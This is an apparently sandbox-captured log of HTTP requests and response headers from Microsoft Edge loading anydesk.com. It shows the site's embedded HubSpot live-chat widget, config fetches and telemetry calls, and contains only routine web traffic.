date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: application/javascript; charset=utf-8
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Fri, 04 Oct 2024 11:58:06 UTC
etag: W/"6b513baaf4c77cddc702f596c3dd62d9"
x-amz-server-side-encryption: AES256
x-amz-version-id: ntxqQzn.1wWRtdFp_E4nJAhKHFNI4WSr
content-encoding: gzip
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 2a3aa853116c0a37d6c7762eca54d208.cloudfront.net (CloudFront)
x-amz-cf-pop: IAD12-P3
x-amz-cf-id: ucaeyCzRpBDcnM1KOUGILDGvquXBfOxqm9XQZ9Id6ZejkCbGl-lt8w==
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://send.hsbrowserreports.com/csp/report?resource=web-interactives-embed/static-2.1554/bundles/project.js&cfRay=8cd50e80bc0173f1-CDG
cache-control: max-age=600
x-hs-target-asset: web-interactives-embed/static-2.1554/bundles/project.js
x-content-type-options: nosniff
x-hs-cache-status: MISS
x-envoy-upstream-service-time: 6
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 98aac6a5-f38c-4a8e-bdfb-30e3051b9647
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-6c6dd6864-g2jhv
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 98aac6a5-f38c-4a8e-bdfb-30e3051b9647
cache-tag: staticjsapp-web-interactives-embed-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 249
set-cookie: __cf_bm=jwQ5NTk.QDgujC8dxyjEjeg2uJ9myagMmHdQMEhHT98-1728144468-1.0.1.1-0GNoxx3P56qs8rRibueVGmlLDyD9THPzLLj5pIT5mbSZNonzZjOotOslFssH0oeJQ9UQ91F89nW.7Kq9.87PXw; path=/; expires=Sat, 05-Oct-24 16:37:48 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uSkHs51X%2BSoQ36VWyzaiUI6GlvnHfyPgdFSm9DD9emZOK0sNFUy5YAOsbYQBIj%2BHtPyA7qVB%2BazQxSlTINRUW5gsiPjpleQtu%2FI1KCtqhF%2FJssFPDDQRUSns%2FWJG0pYF"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=OR4EO_3tiUN_2o0V9THMAAYHkNZgcVkqeEh_rUR7WRw-1728144468809-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeaab1e83c0bad-AMS
OPTIONS

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&traceId=8893101b35bc4d91b27a3a37f6a31415&referrer=https%3A%2F%2Fwww.bing.com%2F

msedge.exe

Remote address:

104.16.117.116:443

Request

OPTIONS /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&traceId=8893101b35bc4d91b27a3a37f6a31415&referrer=https%3A%2F%2Fwww.bing.com%2F HTTP/2.0
host: api.hubspot.com
accept: */*
access-control-request-method: GET
access-control-request-headers: x-hubspot-messages-uri
origin: https://anydesk.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:49 GMT
content-type: text/plain; charset=utf-8
content-length: 18
cf-ray: 8cdeaab31a1e0bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
allow: HEAD,GET,OPTIONS
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 9b42dbe1-f41e-422b-b958-79bf8f7cf794
set-cookie: __cf_bm=LHyA9XD0ya1XR.65msJ.JYaKg6YG1cFZB6s_pYMgrDA-1728144469-1.0.1.1-KeN8LOqgU4mQSgX24BS7aMNbVSGaER3VfmN3C8NkGNiiIcm0k8yCSeEe514ydos0.s7EwSbFITPEkjCqTCjSLg; path=/; expires=Sat, 05-Oct-24 16:37:49 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=373SMd9cr1ODFkRFs49%2Fu4uphEvqmvYaZG6q3wj3MiSPDnnNQiu%2BHTTBHZ1ixqEkc5%2FGvLYTbC8AwM4DkBDumIzsOQ6S0hDrFQg22sG9VdT0lS02dHSN1sXojqUX4kUbvA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=9x.ixvoPNgiGD_jD4Jh8v5CinD9mnMwUBpbiBIFbAjM-1728144469111-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen&referrer=https%3A%2F%2Fwww.bing.com%2F

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen&referrer=https%3A%2F%2Fwww.bing.com%2F HTTP/2.0
host: cta-service-cms2.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:49 GMT
content-type: application/json;charset=utf-8
vary: origin
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent
access-control-allow-credentials: true
x-content-type-options: nosniff
access-control-allow-origin: https://anydesk.com
access-control-allow-methods: OPTIONS, GET
access-control-max-age: 180
cache-control: max-age=0, no-cache, no-store
x-robots-tag: noindex, follow
x-envoy-upstream-service-time: 8
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 428f88ac-ca6c-4603-b88d-c79d3b6cff8f
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-5485db5487-npl4k
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 428f88ac-ca6c-4603-b88d-c79d3b6cff8f
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=.3UWR1QMVhiIyqQPozWs76BJAHWRMGXc4v0QovQrdYE-1728144469-1.0.1.1-dZkyuGbiv3NtpLhA_xjdhUVk91aHkrdwyHkDqee1yqnCipitZaJJVvdRRLkc3X2LNCLCw2_wt.opWRrYgHZubQ; path=/; expires=Sat, 05-Oct-24 16:37:49 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3U1qPmT%2BaHznIpxTjJl6Ct2q7rVw0hs1BNc7cxjLrj7k5av0nz8rW6FLaxqb5r49tE8RFRRvPDbOpqPolMWiO6pooLBRmcblon4kDHdFK1NGdKILkaTWD9FOWFpsjPJ5va3kHKsnpJORrnCi8w%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=9w2LVVFceSCaBQBbmuO.6_va18ovjzGT2s7tl9WWAfo-1728144469151-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeaab36a7f0bad-AMS
content-encoding: br
GET

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&traceId=8893101b35bc4d91b27a3a37f6a31415&referrer=https%3A%2F%2Fwww.bing.com%2F

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&traceId=8893101b35bc4d91b27a3a37f6a31415&referrer=https%3A%2F%2Fwww.bing.com%2F HTTP/2.0
host: api.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
sec-ch-ua-mobile: ?0
x-hubspot-messages-uri: https://anydesk.com/en
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:49 GMT
content-type: application/json;charset=utf-8
content-length: 1472
cf-ray: 8cdeaab69ef80bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
cache-control: no-cache, no-store, no-transform, must-revalidate, max-age=0
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 25c7c0b5-ff61-4cc7-9864-f2df4b638e03
set-cookie: __cf_bm=z.hvrFfenQCNML9Xt5G8NZVgjm2_3.AVPYW_Z2ABdjQ-1728144469-1.0.1.1-9mrCgNOmWU3pALQd27ChSaJYAj8H6kl_SxLdJ.psCyCvY.ygqNjrakTBC.s_R_htLQkSQhraAO50oUDcYIiJxg; path=/; expires=Sat, 05-Oct-24 16:37:49 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e3%2Fxd4eY8YgoRpPcLlWpAV2yR7to%2F4LcpNab%2FOHz9zjB1Z8c3fJkILfhjFkllAdM%2FyQi1wwlyEZc7%2FMtiXi0Ui8o%2FFdf6CtOjuHoK74%2B4yBdv9stCvAErLKEArTXdzgKtw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=Hwdlvdt6WjUBYwTBDf3e.XG_X9eKOG4K1lB2gmaTT0w-1728144469820-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/conversations-visitor/7940397/threads/utk/8893101b35bc4d91b27a3a37f6a31415?uuid=9fdc7cd13e7b49d8bb94679511f5d87c&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=&domain=anydesk.com&inApp53=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&url=https%3A%2F%2Fanydesk.com%2Fen&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /conversations-visitor/7940397/threads/utk/8893101b35bc4d91b27a3a37f6a31415?uuid=9fdc7cd13e7b49d8bb94679511f5d87c&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=&domain=anydesk.com&inApp53=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&url=https%3A%2F%2Fanydesk.com%2Fen&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:50 GMT
content-type: text/html; charset=utf-8
cf-ray: 8cdeaabcf89c0bad-AMS
cf-cache-status: DYNAMIC
age: 2247
cache-control: max-age=600
content-encoding: gzip
etag: W/"92cfcc4f73d45a74e3aa5782ce9dc842"
last-modified: Tue, 01 Oct 2024 19:53:43 UTC
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
via: 1.1 f57a09c5455a80253c61001d750462e6.cloudfront.net (CloudFront)
access-control-allow-credentials: false
cache-tag: staticjsapp-conversations-visitor-ui-web-prod,staticjsapp-prod
content-security-policy-report-only: script-src 'self' www.hubspot.com *.hsappstatic.net *.hs-analytics.net *.hs-banner.com *.hsforms.net *.hsleadflows.net *.hs-scripts.com *.hubspotfeedback.com *.usemessages.com js.hubspot.com *.hsadspixel.net *.hscollectedforms.net js-agent.newrelic.com bam.nr-data.net bam-cell.nr-data.net *.google-analytics.com www.googletagmanager.com data: 'unsafe-inline' 'unsafe-eval' blob: connect.facebook.net www.gstatic.cn www.gstatic.com www.google.com www.recaptcha.net *.fullstory.com fullstory.com apis.google.com snap.licdn.com; report-uri https://send.hsbrowserreports.com/csp/report?resource=conversations-visitor-ui/static-1.20626/html/index.html&cfRay=8cdeaabcf89c0bad&reqUrl=https%3A%2F%2Fapp.hubspot.com%2Fconversations-visitor%2F7940397%2Fthreads%2Futk%2F8893101b35bc4d91b27a3a37f6a31415%3Fuuid%3D9fdc7cd13e7b49d8bb94679511f5d87c%26mobile%3Dfalse%26mobileSafari%3Dfalse%26hideWelcomeMessage%3Dfalse%26hstc%3D%26domain%3Danydesk.com%26inApp53%3Dfalse%26messagesUtk%3D8893101b35bc4d91b27a3a37f6a31415%26url%3Dhttps%253A%252F%252Fanydesk.com%252Fen%26inline%3Dfalse%26isFullscreen%3Dfalse%26globalCookieOptOut%3D%26isFirstVisitorSession%3Dtrue%26isAttachmentDisabled%3Dfalse%26isInitialInputFocusDisabled%3Dfalse%26enableWidgetCookieBanner%3Dfalse%26isInCMS%3Dfalse%26hideScrollToButton%3Dtrue%26isIOSMobile%3Dfalse&referrer=https%3A%2F%2Fanydesk.com%2F&cfenv=prod&pdt=2024-10-05&csp=ro
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://send.hsbrowserreports.com/csp/reports"}]}
reporting-endpoints: default="https://send.hsbrowserreports.com/csp/reports?cfRay=8cdeaabcf89c0bad&resource=conversations-visitor-ui/static-1.20626/html/index.html"
x-amz-cf-id: lEnV5B83gYEcIYoG6m73ibWnBKlnM8lqWb1eW9Vtuz1vQtA0_2uH5A==
x-amz-cf-pop: IAD12-P3
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-version-id: hVkVcK8l8m_IHBKUGh9hahU3mPpZRmCl
x-cache: Hit from cloudfront
x-content-type-options: no-sniff
x-envoy-upstream-service-time: 8
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-6c6dd6864-8c628
x-evy-trace-virtual-host: all
x-hs-cache-status: MISS
x-hs-target-asset: conversations-visitor-ui/static-1.20626/html/index.html
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: fe42ebe3-57bf-4451-846f-d7096cf9ff04
x-request-id: fe42ebe3-57bf-4451-846f-d7096cf9ff04
set-cookie: __cf_bm=LZYq.UatusFqhW7FaVeGJC1KMZs7UGGOJS1A_1FxJeY-1728144470-1.0.1.1-mwp8HIGLFNvYNyhKIs2UlZRbLDABAzq3qWMrLRvyKC2WfqoUQYdBnmpUDO5c5ShPhPvxywcRteo3RJqVl_CNaA; path=/; expires=Sat, 05-Oct-24 16:37:50 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
set-cookie: _cfuvid=bjNPa_XI7Kes2mhGVJDi.wl9jn6sV4lu7NyxPFplW8I-1728144470731-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 406
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/8893101b35bc4d91b27a3a37f6a31415?uuid=9fdc7cd13e7b49d8bb94679511f5d87c&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=&domain=anydesk.com&inApp53=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&url=https%3A%2F%2Fanydesk.com%2Fen&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:07:54 GMT
cf-ray: 8cdeaad3dca80bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=22aadf31-8bb4-4f71-9863-6e77b771ffff
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 22aadf31-8bb4-4f71-9863-6e77b771ffff
set-cookie: __cf_bm=qynyMLYVf7.YtHRDR13Jh7fcSu5sULLS_P2a7E92Pac-1728144474-1.0.1.1-Hd1hK_1Bl801fnt9.dn2JejUCousZwyzuu33Ic3ohTJ4xA.R16.MCX.Ipw8Rrh_4BcP.rAwHu98UPU3s6flL4g; path=/; expires=Sat, 05-Oct-24 16:37:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7P1Bi7zTLtUe7RfQX7T1k%2F5k7c1tSZedul2K0WvOtCOEY9nX8BSgEGhRL%2FQHoXaUs6Dlf0VWRX%2FgzZaYt%2FsAC%2FivH0l33sRIhOpCgs3%2F69BILY1pp0VUNW%2BGQ0e9sxRdIA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=mu5.r5erj4bH2n56XFiiuYyig9MsMtC6CmJserqASy4-1728144474381-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=8893101b35bc4d91b27a3a37f6a31415&sessionId=AMOaWbLdq_g1gMPB8psWFrdRuVzob_tYgwG-BTSelq8Ua3wdFTplyfsORxPYaDte2dQQfOMhYBHFvBj-7JfWqQ2bcIdQduzd-aiA_3_XTr0xl5I-Kofk2WKay5rvOdeIaSqwV67Zveb6-Puneztsl0islqcPmXEjuEBddHYZ96vQe1XO4XmOPlA

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=8893101b35bc4d91b27a3a37f6a31415&sessionId=AMOaWbLdq_g1gMPB8psWFrdRuVzob_tYgwG-BTSelq8Ua3wdFTplyfsORxPYaDte2dQQfOMhYBHFvBj-7JfWqQ2bcIdQduzd-aiA_3_XTr0xl5I-Kofk2WKay5rvOdeIaSqwV67Zveb6-Puneztsl0islqcPmXEjuEBddHYZ96vQe1XO4XmOPlA HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json, text/javascript, */*; q=0.01
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/8893101b35bc4d91b27a3a37f6a31415?uuid=9fdc7cd13e7b49d8bb94679511f5d87c&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=&domain=anydesk.com&inApp53=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&url=https%3A%2F%2Fanydesk.com%2Fen&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:54 GMT
content-type: application/json;charset=utf-8
content-length: 528
cf-ray: 8cdeaad42cec0bad-AMS
cf-cache-status: DYNAMIC
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
server-timing: hcid;desc=7629529c-a65b-450d-abd8-783465099210
x-content-type-options: nosniff
x-hubspot-correlation-id: 7629529c-a65b-450d-abd8-783465099210
set-cookie: __cf_bm=HMxXSTB9ywkITuy_3kWSptpw.KYv7X2rGxVUGOB1WTc-1728144474-1.0.1.1-4oZZGY89Gxg3khTtp6zo02XZEFA4f2KW8KmShLueA5JX3sG_w8AAxb6elNIbKEasoaNT2wV7bGLAZgvH.NmMFg; path=/; expires=Sat, 05-Oct-24 16:37:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OePXTPktSuYOH6ipUwDRd%2BZVCzHkCjP5sHSKFiwh%2BRlnCQ77%2FFE3dZWBmz%2FoofuwfhBNIbrPiNlF4o7VN5cz95mpAvp2ilV1%2FVBoJzB6IFgFi1nMelRA6twk30QP9fN44A%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=oUqiQncWrK_NUafvppg1JDMdAWCMNyymBJr5XZyGy_4-1728144474406-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2003
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:54 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
